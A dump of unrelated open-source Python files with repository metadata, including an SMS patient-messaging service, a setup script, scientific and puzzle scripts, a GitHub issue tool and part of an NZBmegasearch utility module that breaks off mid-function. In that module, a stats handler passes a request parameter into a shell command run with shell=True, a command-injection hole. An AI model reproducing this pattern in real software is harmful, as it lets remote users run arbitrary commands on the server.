code stringlengths 2 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int32 2 1.05M |
|---|---|---|---|---|---|
from sris import db, models
from messenger import Messenger
from service import SMSService
from datetime import datetime
class Manager:
"""
The middle-man of interaction between messenger and the SMS service.
"""
def __init__(self):
self.config = self.__load_config_file()
self.messenger = Messenger(self.config)
self.sms_service = SMSService()
def send_initial_greeting(self):
"""
Sends the initial SMS to new* patients at a pre-defined client time.
*New patients are those that have recently been added
to the clients database, which the service does not know.
Note: this is REQUIRED otherwise 'respond' & other services do not
function as database errors are thrown (understandably).
"""
from datetime import datetime
current_time = str(datetime.now().time())[0:5]
# Send the message to new patients at the defined time.
if current_time == self.config['initialQuestion']['time']:
for number in self.__new_patients():
message = self.messenger.initial_message()
self.sms_service.send(number, message)
self.__create_new_patient(number)
self.__save_message(number, message, 'sent')
def respond(self, patient_response):
"""
Respond to new SMS when it is received via a POST request.
Args:
patient_message (dict): Contains the number, and message sent to
the service by a patient.
Returns:
response (XML): twilio formatted response.
"""
number = patient_response['number']
patient_message = patient_response['message']
# Generate a reflective summary based on the patient's response.
summary = self.messenger.summary(patient_message)
# TODO: Fix this with the system set time (i.e. UTC)
midnight = int(datetime.today().strftime("%s")) - 24*60*60
# The number of questions sent since last night.
_questions = db.session.query(models.Message).filter(
models.Message.mobile == number,
models.Message.status == 'sent',
models.Message.timestamp >= midnight).all()
all_sent = [item.message for item in _questions]
# The number of OEQ sent since last night.
num_oeq = len([i for i in self.config['questions'] if i in all_sent])
print 'Number OEQ sent since last night was: %s' % str(num_oeq)
response = None
# Do not send a response if initial daily conversation not started.
if num_oeq >= 1:
print 'The last sms sent was: %s' % all_sent[-1]
if all_sent[-1] in self.config['questions']:
print 'Last message sent was an OEQ. Sending a RS to patient.'
response = summary
else:
print 'Inside the else..'
if (num_oeq >= int(self.config['limit'])): # True: OEQ >= LIMIT
print 'Inside the else... in the if...'
if self.config['endQuestion'] not in all_sent:
print 'Sending the conversation closer as limit met.'
response = self.config['endQuestion']
else:
print 'Message received was response to a RS. Sending OEQ.'
response = self.__select_question(number)
if response:
self.__save_message(number, patient_message, 'received')
self.__save_message(number, response, 'sent')
print 'The response (%s) has been saved to the database.' % response
return self.sms_service.reply(response)
else:
print 'No response was created.'
return '' # Prevents a 500 error code returned to POST.
def send_initial_question_to_all(self):
"""
Sends a question to all patients at a pre-defined day and time.
"""
known_patients = [item.mobile for item in
db.session.query(models.Patient.mobile).all()]
from datetime import datetime
print "Checking to see if open-ended question should be sent."
isDay = datetime.now().strftime("%A") in self.config["daysToSend"]
isTime = str(datetime.now().time())[0:5] == self.config["sendTime"]
if isDay and isTime:
for number in known_patients:
message = self.__select_question(number)
print "OEQ (%s) to patient (%s)." % (message, number)
self.__save_message(number, message, 'sent')
self.sms_service.send(number, message)
def __select_question(self, number):
"""
Select a client-defined open-ended question that has not been previously
selected at random. If all have been sent then select one at random.
Args:
number (str): The mobile number of the patient.
Returns:
str: An open-ended question to ask the patient.
"""
questions = self.config['questions']
sent_questions = [item.message for item in db.session.query(
models.Message).filter(models.Message.mobile == number).all()]
unsent_questions = list(set(questions).difference(sent_questions))
# TODO: Select most important question based on client's situation
import random
if unsent_questions:
print "Sending a message that HAS NOT been previously sent."
message = random.choice(unsent_questions)
else:
print "Sending a message that HAS been previously sent."
message = random.choice(questions)
return message
def __load_config_file(self):
"""
Stores the contents of the client-defined config file to a json object.
Returns:
json: A json object of the user-defined config file.
"""
import json
from flask import current_app
config_file = current_app.config['PROJECT_ROOT'] + '/sris/config/' + \
current_app.config['CLIENT_NAME'] + '.json'
with open(config_file) as json_settings:
return json.load(json_settings)
def __new_patients(self):
"""
Checks to see if any new patients have been added to the client DB.
Returns:
list: Mobile numbers the client knows & the service does not.
"""
# ALL numbers obtained from the client.
client_numbers = db.session.query(models.Patient.mobile).all()
# The numbers the service has to date.
service_numbers = db.session.query(models.User.mobile).all()
# The numbers the client has, but the service does not.
numbers = set(client_numbers).difference(service_numbers)
print 'There was %s new patients' % str(len(numbers))
# Convert SQLAlchemy KeyedTuple to ordinary list.
return [item.mobile for item in numbers]
def __create_new_patient(self, number):
"""
Adds the patient to the service database.
Args:
number (str): The mobile number of the patient.
"""
db.session.add(models.User(mobile=number))
db.session.commit()
def __save_message(self, number, message, status):
"""
Save the SMS message (sent or received) to the service database.
Args:
number (str): The mobile number of the patient.
message (str): The SMS message content.
status (str): The status of the message, e.g. 'sent' or 'received'.
"""
db.session.add(models.Message(mobile=number, message=message,
status=status))
db.session.commit()
| jawrainey/sris | sris/manager.py | Python | mit | 7,789 |
#!/usr/bin/env python3
import sys
import os
from setuptools import setup, find_packages
import amqpy
if sys.version_info < (3, 2):
raise Exception('amqpy requires Python 3.2 or higher')
name = 'amqpy'
description = 'an AMQP 0.9.1 client library for Python >= 3.2.0'
keywords = ['amqp', 'rabbitmq', 'qpid']
classifiers = [
'Development Status :: 4 - Beta',
'Programming Language :: Python',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'License :: OSI Approved :: MIT License',
'Intended Audience :: Developers',
'Topic :: Internet',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Networking'
]
package_data = {
'': ['*.rst', '*.ini', 'AUTHORS', 'LICENSE'],
}
def long_description():
if os.path.exists('README.rst'):
with open('README.rst') as f:
return f.read()
else:
return description
setup(
name=name,
description=description,
long_description=long_description(),
version=amqpy.__version__,
author=amqpy.__author__,
author_email=amqpy.__contact__,
maintainer=amqpy.__maintainer__,
url=amqpy.__homepage__,
platforms=['any'],
license='LGPL',
packages=find_packages(exclude=['ez_setup', 'tests', 'tests.*']),
package_data=package_data,
tests_require=['pytest>=2.6'],
classifiers=classifiers,
keywords=keywords
)
| gst/amqpy | setup.py | Python | mit | 1,664 |
import sys
import argparse
from itertools import izip
import math
def parseArgument():
# Parse the input
parser = argparse.ArgumentParser(description = "Make regions with 0 signal the average of their surrounding regions")
parser.add_argument("--signalsFileName", required=True, help='Signals file')
parser.add_argument("--peakIndexesFileName", required=True, help='Peak indexes file')
parser.add_argument("--outputFileName", required=True, help='Output file, where signals that were 0 will be the average of their surrounding signals')
options = parser.parse_args();
return options
def averageZeroSignalsWithinPeaks(options):
signalsFile = open(options.signalsFileName)
peakIndexesFile = open(options.peakIndexesFileName)
outputFile = open(options.outputFileName, 'w+')
lastSignal = None
lastLastSignal = None
lastPeakIndex = None
lastLastPeakIndex = None
for signalsLine, peakIndexesLine in izip(signalsFile, peakIndexesFile):
# Iterate through the signals and set those that are zero to the average of those of the surrounding regions
signal = float(signalsLine.strip())
peakIndex = int(peakIndexesLine.strip())
if lastSignal == 0:
# The previous signal was a zero, so set it to the average of the surrounding signals
if (peakIndex == lastPeakIndex) and (not math.isnan(lastSignal)):
# Include the current region in the average
if (lastPeakIndex == lastLastPeakIndex) and (not math.isnan(lastLastSignal)):
# Include the region before the previous region in the average
if not math.isnan(signal):
# The current signal is not a nan, so include it in the average
lastSignalCorrected = (signal + lastLastSignal)/2.0
outputFile.write(str(lastSignalCorrected) + "\n")
else:
# The current signal is a nan, so use only the previous signal
outputFile.write(str(lastLastSignal) + "\n")
elif not math.isnan(signal):
outputFile.write(str(signal) + "\n")
else:
outputFile.write(str(lastSignal) + "\n")
elif (lastPeakIndex == lastLastPeakIndex) and (not math.isnan(lastLastSignal)):
# Set the output to the region before it
outputFile.write(str(lastLastSignal) + "\n")
else:
outputFile.write(str(lastSignal) + "\n")
if signal != 0:
# The current signal is not 0, so record it
outputFile.write(str(signal) + "\n")
lastLastSignal = lastSignal
lastLastPeakIndex = lastPeakIndex
lastSignal = signal
lastPeakIndex = peakIndex
if lastSignal == 0:
# The final signal was a zero, so set it to the signal before it
if (lastPeakIndex == lastLastPeakIndex) and (not math.isnan(lastLastSignal)):
# Set the output to the region before it
outputFile.write(str(lastLastSignal) + "\n")
else:
outputFile.write(str(lastSignal) + "\n")
signalsFile.close()
peakIndexesFile.close()
outputFile.close()
if __name__=="__main__":
options = parseArgument()
averageZeroSignalsWithinPeaks(options)
| imk1/IMKTFBindingCode | averageZeroSignalsWithinPeaks.py | Python | mit | 2,918 |
#!/usr/bin/python3
#!python3
#encoding:utf-8
import sys
import os.path
import subprocess
import configparser
import argparse
import web.service.github.api.v3.AuthenticationsCreator
import web.service.github.api.v3.Client
import database.src.Database
import cui.uploader.Main
import web.log.Log
import database.src.contributions.Main
import setting.Setting
class Main:
def __init__(self):
pass
def Run(self):
self.__def_args()
self.__setting = setting.Setting.Setting(os.path.abspath(os.path.dirname(__file__)))
# os.path.basename()で空文字を返されないための対策
# https://docs.python.jp/3/library/os.path.html#os.path.basename
# if self.__args.path_dir_pj.endswith('/'): self.__args.path_dir_pj = self.__args.path_dir_pj[:-1]
if None is self.__args.username: self.__args.username = self.__setting.GithubUsername
self.__db = database.src.Database.Database(os.path.abspath(os.path.dirname(__file__)))
self.__db.Initialize()
if None is self.__db.Accounts['Accounts'].find_one(Username=self.__args.username):
web.log.Log.Log().Logger.warning('指定したユーザ {0} はDBに存在しません。UserRegister.pyで登録してください。'.format(self.__args.username))
return
self.__account = self.__db.Accounts['Accounts'].find_one(Username=self.__args.username)
self.__ssh_configures = self.__db.Accounts['SshConfigures'].find_one(AccountId=self.__account['Id'])
self.__repo_name = os.path.basename(self.__args.path_dir_pj)
self.__repos = self.__db.Repositories[self.__args.username]['Repositories'].find_one(Name=self.__repo_name)
if None is self.__repos:
web.log.Log.Log().Logger.warning('指定リポジトリがDBに存在しません。: {0}/{1}'.format(self.__args.username, self.__repo_name))
return
# self.__log()
issue = self.__create_issue()
print('Issue番号:', issue['number'])
print(issue)
def __def_args(self):
parser = argparse.ArgumentParser(
description='GitHub Repository Creator.',
)
parser.add_argument('path_dir_pj')
parser.add_argument('-u', '--username')
# parser.add_argument('-r', '--reponame', required=True)
parser.add_argument('-i', '--issues', required=True, action='append')
parser.add_argument('-l', '--labels', action='append')
parser.add_argument('-c', '--is-close', action='store_false') # is_close
self.__args = parser.parse_args()
def __log(self):
web.log.Log.Log().Logger.info('ユーザ名: {0}'.format(self.__account['Username']))
web.log.Log.Log().Logger.info('メアド: {0}'.format(self.__account['MailAddress']))
web.log.Log.Log().Logger.info('SSH HOST: {0}'.format(self.__ssh_configures['HostName']))
# web.log.Log.Log().Logger.info('リポジトリ名: {0}'.format(self.__repos['Name']))
# web.log.Log.Log().Logger.info('説明: {0}'.format(self.__repos['Description']))
# web.log.Log.Log().Logger.info('URL: {0}'.format(self.__repos['Homepage']))
web.log.Log.Log().Logger.info('リポジトリ名: {0}'.format(self.__repo_name))
web.log.Log.Log().Logger.info('説明: {0}'.format(self.__args.description))
web.log.Log.Log().Logger.info('URL: {0}'.format(self.__args.homepage))
def __create_issue(self):
auth_creator = web.service.github.api.v3.AuthenticationsCreator.AuthenticationsCreator(self.__db, self.__args.username)
authentications = auth_creator.Create()
client = web.service.github.api.v3.Client.Client(self.__db, authentications, self.__args)
title = self.__args.issues[0]
body = None
# 1行目タイトル, 2行目空行, 3行目以降本文。
if 1 < len(self.__args.issues): body = '\n'.join(self.__args.issues[1:])
return client.Issues.create(title, body=body)
# main = cui.uploader.Main.Main(self.__db, client, args)
# main.Run()
# creator = cui.uploader.command.repository.Creator.Creator(self.__db, client, self.__args)
# creator.Create()
if __name__ == '__main__':
main = Main()
main.Run()
| trysrv/GitHub.Uploader.CuiCmd.201706231541 | IssueCreate.py | Python | cc0-1.0 | 4,273 |
'''
NPR Puzzle 2018-10-28
https://www.npr.org/2018/10/28/660936138/sunday-puzzle-row-row-row
Think of a famous Broadway musical in two words.
Change one letter in it to the preceding letter of the alphabet —
so B would become A, C would become B, etc.
Remove the space so you have a solid word.
The result will name something that all of us are part of. What is it?
'''
import sys
sys.path.append('..')
import nprcommontools as nct
from nltk.corpus import wordnet as wn
import re
#%%
# Get a list of musicals from Wikipedia
musicals = set(x for x in nct.wikipedia_category_members('Broadway_musicals') if x.count(' ') == 1)
#musicals = musicals.union(wikipedia_category_members('Off-Broadway_musicals'))
#musicals = musicals.union(wikipedia_category_members('American musical films'))
words = set(x for x in wn.all_lemma_names() if x.count('_') == 0)
#%%
# Go through musicals and look for ones that work
for musical in musicals:
musical_nospace = re.sub(r'[^A-Za-z]+','',musical).lower()
for i in range(len(musical_nospace)):
letter = musical_nospace[i]
myword = musical_nospace[:i] + nct.letter_shift(letter,-1) + musical_nospace[i+1:]
if myword in words:
print(musical,myword)
| boisvert42/npr-puzzle-python | 2018/1028_musical_all_of_us.py | Python | cc0-1.0 | 1,235 |
import OOMP
newPart = OOMP.oompItem(8826)
newPart.addTag("oompType", "CAPC")
newPart.addTag("oompSize", "0603")
newPart.addTag("oompColor", "X")
newPart.addTag("oompDesc", "PF100")
newPart.addTag("oompIndex", "V50")
OOMP.parts.append(newPart)
| oomlout/oomlout-OOMP | old/OOMPpart_CAPC_0603_X_PF100_V50.py | Python | cc0-1.0 | 245 |
# Projectiles
import pygame
import environment
from models import Projectile
class Laser(Projectile):
def __init__(self, laser_x, laser_y, sign=None, speed=20):
self.laser_height = 20
self.laser_width = environment.WINDOW_WIDTH - laser_x
self.laser_rect = pygame.Rect(laser_x, laser_y, self.laser_width, self.laser_height)
Projectile.__init__(self, self.laser_rect, sign)
self.base_speed = speed
class Bullet(Projectile):
""" def __init__(self, spawn_x, spawn_y):
self.bullet_width = 10
self.bullet_height = 3
self.bullet_rect = pygame.Rect(spawn_x, spawn_y, self.bullet_width, self.bullet_height)
Projectile.__init__(self, self.bullet_rect)
self.base_speed = 20
"""
def __init__(self, posx=0, posy=0, dimx=10, dimy=3, sign=None, parent_stat=None, speed=20):
dummy_rect = pygame.Rect(posx, posy, dimx, dimy)
Projectile.__init__(self, dummy_rect, sign, parent_stats=parent_stat)
self.base_speed = speed
def is_out_of_screen(self):
return self.right > environment.WINDOW_WIDTH
| mrnoodles/AI-Pygame | models/projectiles.py | Python | cc0-1.0 | 1,123 |
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import sys
#
# use pretty plotting if it can be imported
#
try:
import seaborn
except:
pass
sigma=5.67e-8
def find_tau(tot_trans,num_layers):
"""
# -TD- document using
"""
trans_layer=tot_trans**(1./num_layers)
tau_layer= -1.*np.log(trans_layer)
tau_layers=np.ones([num_layers])*tau_layer
tau_levels=np.cumsum(tau_layers)
tau_levels=np.concatenate(([0],tau_levels))
return tau_levels
def find_heights(press_levels,rho_layers):
"""
-TD- docstring using google style
"""
Rd=287.
g=9.8
press_layers=(press_levels[1:] + press_levels[:-1])/2.
del_press=(press_levels[1:] - press_levels[0:-1])
rho_layers=press_layers/(Rd*Temp_layers)
del_z= -1.*del_press/(rho_layers*g)
level_heights=np.cumsum(del_z)
level_heights=np.concatenate(([0],level_heights))
return level_heights
def fluxes(tau_levels,Temp_layers,T_surf):
"""
-TD- docstring using google style
"""
up_rad=np.empty_like(tau_levels)
down_rad=np.empty_like(tau_levels)
sfc_rad=sigma*T_surf**4.
up_rad[0]=sfc_rad
tot_levs=len(tau_levels)
for index in np.arange(1,tot_levs):
upper_lev=index
lower_lev=index - 1
layer_num=index-1
del_tau=tau_levels[upper_lev] - tau_levels[lower_lev]
trans=np.exp(-1.666*del_tau)
emiss=1 - trans
layer_rad=sigma*Temp_layers[layer_num]**4.*emiss
up_rad[upper_lev]=trans*up_rad[lower_lev] + layer_rad
down_rad[tot_levs-1]=0
for index in np.arange(1,tot_levs):
upper_lev=tot_levs - index
lower_lev=tot_levs - index -1
layer_num=tot_levs - index - 1
del_tau=tau_levels[upper_lev] - tau_levels[lower_lev]
trans=np.exp(-1.666*del_tau)
emiss=1 - trans
layer_rad=sigma*Temp_layers[layer_num]**4.*emiss
down_rad[lower_lev]=down_rad[upper_lev]*trans + layer_rad
return (up_rad,down_rad)
def heating_rate(net_up,height_levels,rho_layers):
"""
-TD- docstring using google style
"""
cpd=1004.
dFn_dz= -1.*np.diff(net_up)/np.diff(height_levels)
dT_dt=dFn_dz/(rho_layers*cpd)
return dT_dt
def time_step(heating_rate,Temp_layers,delta_time):
"""
-TD- docstring using google style
"""
Temp_layers[:] = Temp_layers[:] + heating_rate*delta_time
return Temp_layers
if __name__=="__main__":
tot_trans=0.2
num_layers=100
p_sfc=1000.*1.e2
p_top=100.*1.e2
g=9.8
T_sfc=300.
Rd=287. #J/kg/K
num_levels=num_layers+1
tau_levels=find_tau(tot_trans,num_layers)
press_levels=np.linspace(p_top,p_sfc,num_levels)
press_diff=np.diff(press_levels)[0]
press_levels=press_levels[::-1]
press_layers=(press_levels[1:] + press_levels[:-1])/2.
Temp_levels=np.ones([num_levels])*T_sfc
Temp_layers=(Temp_levels[1:] + Temp_levels[:-1])/2.
S0=241.
Tc=273.15
delta_time_hr=30 #time interval in hours
delta_time_sec=30*3600. #time interval in seconds
stop_time_hr=600*24. #stop time in hours
times=np.arange(0,stop_time_hr,delta_time_hr) #times in hours
tot_loops=len(times)
num_times=len(times)
#
# -TD- comment which variables are defined on levels, and which on layers
#
sfc_temp=np.empty([num_times],dtype=np.float64)
hours=np.empty_like(sfc_temp)
#
# -TD- describe what the 2-d arrays are used for
#
air_temps=np.empty([num_layers,num_times],dtype=np.float64)
up_flux_run=np.empty([num_levels,num_times],dtype=np.float64)
down_flux_run=np.empty_like(up_flux_run)
height_levels_run=np.empty_like(up_flux_run)
for index in np.arange(0,num_times):
rho_layers=press_layers/(Rd*Temp_layers)
height_levels=find_heights(press_levels,rho_layers)
up,down=fluxes(tau_levels,Temp_layers,T_sfc)
sfc_temp[index]=T_sfc
#
# -TD- describe what this loop does
#
if np.mod(index,50)==0:
the_frac=np.int(index/tot_loops*100.)
sys.stdout.write("\rpercent complete: %d%%" % the_frac)
sys.stdout.flush()
air_temps[:,index]=Temp_layers[:]
up,down=fluxes(tau_levels,Temp_layers,T_sfc)
up_flux_run[:,index]=up[:]
down_flux_run[:,index]=down[:]
height_levels_run[:,index]=height_levels[:]
dT_dt=heating_rate(up-down,height_levels,rho_layers)
Temp_layers[:]=time_step(dT_dt,Temp_layers,delta_time_sec)
#
# -TD- describe what the following statements do
#
net_downsfc=S0 + down[0]
T_sfc=(net_downsfc/sigma)**0.25
plt.close('all')
fig1,axis1=plt.subplots(1,1)
snapshots=[0,2,8,30,40,50,60,70]
days=times/24.
for the_snap in snapshots:
#
# -TD- describe what the label does
#
label="%3.1f" % days[the_snap]
height_levels=height_levels_run[:,the_snap]
layer_heights=(height_levels[1:] + height_levels[:-1])/2.
axis1.plot(air_temps[:,the_snap],layer_heights*1.e-3,label=label)
axis1.legend()
axis1.set_title('temperature profiles for {} days'.format(len(snapshots)))
axis1.set_xlabel('temperature (deg C)')
fig1.savefig("snapshots.png")
fig2,axis2=plt.subplots(1,1)
axis2.plot(days,sfc_temp-Tc)
axis2.set_title('surface temperature (deg C)')
axis2.set_ylabel('temperature (degC)')
axis2.set_xlabel('day')
axis2.set_xlim((0,100))
fig2.savefig("sfc_temp.png")
fig3,axis3=plt.subplots(1,1)
axis3.plot(days,sfc_temp - air_temps[0,:])
axis3.set_title('air-sea temperature difference (deg C)')
axis3.set_ylabel('surface - first layer temp (degC)')
axis3.set_xlabel('day')
axis3.set_xlim((0,100))
fig3.savefig("air_sea.png")
plt.show()
| dennissergeev/classcode | lib/equil_run.py | Python | cc0-1.0 | 5,877 |
import simplejson as json
import urllib
import urllib2
import time
server = ""
def GET(uri, params):
params = urllib.urlencode(params)
req = urllib2.Request(server + uri + "?" + params , headers={'Accept': 'application/json'})
return json.loads(urllib2.urlopen(req).read())
def POST(uri, params):
params = json.dumps(params)
req = urllib2.Request(server + uri, params, headers={'Content-Type': 'application/json',
'Accept': 'application/json'})
response = json.loads(urllib2.urlopen(req).read())
return response["id"]
def set_server_url(url):
global server
server = url
class Detector:
def __init__(self, name, url):
self.name = name
self.url = url
def get_id(self):
try:
return self.id
except AttributeError:
try:
detectors = GET("/detectors/", {'name': self.name})
self.id = detectors[0]['id']
except urllib2.HTTPError as e:
self.id = POST("/detectors/", {'name': self.name, 'url': self.url})
return self.id
def realize(self):
self.get_id()
class Metric:
def __init__(self, name, descr, detector):
self.name = name
self.descr = descr
self.detector = detector
def get_id(self):
try:
return self.id
except AttributeError:
uri = "/detectors/" + str(self.detector.get_id()) + "/metrics/"
try:
metrics = GET(uri, {'name': self.name})
return metrics[0]['id']
except urllib2.HTTPError as e:
return POST(uri, {'name': self.name, 'description': self.descr})
def realize(self):
self.get_id()
def post_alert(detector, metric, payload, emails="", date=time.strftime("%Y-%m-%d")):
try:
payload = json.dumps(payload)
uri = "/detectors/" + str(detector.get_id()) + "/metrics/" + str(metric.get_id()) + "/alerts/"
return POST(uri, {'description': payload, 'date': date, 'emails': emails})
except urllib2.HTTPError as e:
if e.code == 422:
print "Alert for detector: " + detector.name + ", metric: " + metric.name + ", has already been submitted!"
else:
raise e
if __name__ == "__main__":
set_server_url("http://localhost:8080")
detector = Detector("Histogram Regression Detector", "foobar")
metric = Metric("metric100", "foobar", detector)
post_alert(detector, metric, "foobar")
| mozilla/iacomus-alerts | python/poster.py | Python | epl-1.0 | 2,563 |
# # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## #
#~ This file is part of NZBmegasearch by pillone.
#~
#~ NZBmegasearch is free software: you can redistribute it and/or modify
#~ it under the terms of the GNU General Public License as published by
#~ the Free Software Foundation, either version 3 of the License, or
#~ (at your option) any later version.
#~
#~ NZBmegasearch is distributed in the hope that it will be useful,
#~ but WITHOUT ANY WARRANTY; without even the implied warranty of
#~ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#~ GNU General Public License for more details.
#~
#~ You should have received a copy of the GNU General Public License
#~ along with NZBmegasearch. If not, see <http://www.gnu.org/licenses/>.
# # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## # ## #
import requests
import sys
import base64
import DeepsearchModule
from functools import wraps
from flask import Response,request
import config_settings
from flask import render_template
import os
import subprocess
import datetime
import time
import logging
import SearchModule
import urlparse
import urllib
import datetime
import json
from operator import itemgetter
#~ max visualized
LOG_MAXLINES = 500
log = logging.getLogger(__name__)
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
def logviewer(logsdir):
filename=logsdir+'nzbmegasearch.log'
array1 = []
count = 0
for line in reversed(open(filename).readlines()):
if(count > LOG_MAXLINES):
break
array1.append(line.decode('utf-8').rstrip())
count = count + 1
return(render_template('loginfo.html', loginfo =array1 ))
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
def daemonize(logsdir):
#~ full credits to SICKBEARD
# Make a non-session-leader child process
try:
pid = os.fork() # @UndefinedVariable - only available in UNIX
if pid != 0:
sys.exit(0)
except OSError, e:
raise RuntimeError("1st fork failed: %s [%d]" % (e.strerror, e.errno))
os.setsid() # @UndefinedVariable - only available in UNIX
# Make sure I can read my own files and shut out others
prev = os.umask(0)
os.umask(prev and int('077', 8))
# Make the child a session-leader by detaching from the terminal
try:
pid = os.fork() # @UndefinedVariable - only available in UNIX
if pid != 0:
sys.exit(0)
except OSError, e:
raise RuntimeError("2nd fork failed: %s [%d]" % (e.strerror, e.errno))
dev_null = file('/dev/null', 'r')
os.dup2(dev_null.fileno(), sys.stdin.fileno())
log.info("Daemonized using PID " + str(pid))
#~ LEGACY DAEMON LOGGING
#~ silences console output
#~ sys.stdout = open('tmpdl', 'wt')
#~ logging.basicConfig(
#~ level=logging.DEBUG,
#~ format='%(asctime)s:%(levelname)s:%(name)s:%(message)s',
#~ filename=logsdir+'nzbmegasearch_daemon.log',
#~ filemode='a')
#~ stdout_logger = logging.getLogger('STDOUT')
#~ sl = StreamToLogger(stdout_logger, logging.INFO)
#~ sys.stdout = sl
#~ stderr_logger = logging.getLogger('STDERR')
#~ sl = StreamToLogger(stderr_logger, logging.ERROR)
#~ sys.stderr = sl
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
class StreamToLogger(object):
"""
Fake file-like stream object that redirects writes to a logger instance.
"""
def __init__(self, logger, log_level=logging.INFO):
self.logger = logger
self.log_level = log_level
self.linebuf = ''
def write(self, buf):
for line in buf.rstrip().splitlines():
self.logger.log(self.log_level, line.rstrip())
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
def connectinfo():
return render_template('connectinfo.html')
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
class Auth:
def __init__(self, cfgsetsp):
#~ another instance to not use ptrs
self.cfgsets = config_settings.CfgSettings()
def check_auth(self, username, password, mode):
if(mode == 0):
if(username == self.cfgsets.cgen['general_usr'] and password == self.cfgsets.cgen['general_pwd']):
return True
if(mode == 1):
if(len(self.cfgsets.cgen['config_user']) != 0):
if(username == self.cfgsets.cgen['config_user'] and password == self.cfgsets.cgen['config_pwd']):
return True
else:
if(username == self.cfgsets.cgen['general_usr'] and password == self.cfgsets.cgen['general_pwd']):
return True
return False
def authenticate(self):
"""Sends a 401 response that enables basic auth"""
retres = Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
return retres
def requires_auth(self, f):
@wraps(f)
def decorated(*args, **kwargs):
self.cfgsets.refresh()
if(len(self.cfgsets.cgen['general_usr']) != 0):
auth = request.authorization
if not auth or not self.check_auth(auth.username, auth.password,0):
sret = self.authenticate()
return sret
return f(*args, **kwargs)
else:
return f(*args, **kwargs)
return f(*args, **kwargs)
return decorated
def requires_conf(self, f):
@wraps(f)
def decorated(*args, **kwargs):
if(len(self.cfgsets.cgen['config_user']) != 0 or len(self.cfgsets.cgen['general_usr']) != 0):
auth = request.authorization
if not auth or not self.check_auth(auth.username, auth.password,1):
return self.authenticate()
return f(*args, **kwargs)
else:
return f(*args, **kwargs)
return f(*args, **kwargs)
return decorated
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
class DownloadedStats:
#~ megatransfer
def __init__(self):
import urlparse
cfgsets = config_settings.CfgSettings()
self.cgen = cfgsets.cgen
self.logsdir = SearchModule.resource_path('logs/nzbmegasearch.log')
self.scriptsdir = SearchModule.resource_path('get_stats.sh')
self.cfg_urlidx = []
self.excludeurls= ['http://ftdworld.net', 'https://nzbx.co']
if(cfgsets.cfg is not None):
self.config = cfgsets.cfg
for i in xrange(len(self.config)):
if(self.config[i]['builtin'] == 0):
self.cfg_urlidx.append(i)
def get_generalstats(self,args):
log.info('Stats general have been requested')
savedurl = []
errstr = "WRONG KEY"
if('key' not in args):
return errstr
else:
if(args['key'] != self.cgen['stats_key']):
return errstr
daytochk = datetime.datetime.now().strftime("%Y-%m-%d")
if('d' in args):
daytochk=args['d']
subprocess.call([self.scriptsdir + ' '+self.logsdir + ' ' + daytochk ], shell=True, executable="/bin/bash")
stat_info = {}
with open("/tmp/logstats_gen") as infile:
for line in infile:
value = line.split()
#~ print value
#~ print line
if(value[0] not in stat_info):
stat_info[value[0]] = []
stat_info[value[0]].append( float(value[1]) )
#~ print stat_info
stat_info_curated = []
uidx = 0
for key in stat_info.keys():
meant = float(sum(stat_info[key]))/len(stat_info[key]) if len(stat_info[key]) > 0 else float('nan')
mediant = sorted(stat_info[key])[len(stat_info[key])/2]
stat_info_curated_t = {}
stat_info_curated_t['succ_call'] = len(stat_info[key])
stat_info_curated_t['name'] = key
stat_info_curated_t['mean'] = meant
stat_info_curated_t['median'] = mediant
stat_info_curated_t['min'] = min(stat_info[key])
stat_info_curated_t['max'] = max(stat_info[key])
stat_info_curated.append(stat_info_curated_t)
uidx += 1
stat_info_curated = sorted(stat_info_curated, key=itemgetter('median'))
return render_template('stats_gen.html',stat_cur=stat_info_curated)
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
class ChkServer:
def __init__(self, cgen):
self.cgen = cgen
self.agent_headers = { 'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' }
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
def check(self, args):
ret = 0
if(('hostname' in args) and ('type' in args)):
# Perform the search using every module
global globalResults
if 'loadedModules' not in globals():
SearchModule.loadSearchModules()
#~ specials
if(args['type'] == 'OMG'):
ret = 1
cfg_tmp = {'valid': 1,
'type': 'OMG',
'speed_class': 2,
'extra_class': 0,
'login': args['user'],
'pwd': args['pwd'],
'timeout': self.cgen['timeout_class'][2],
'builtin': 1}
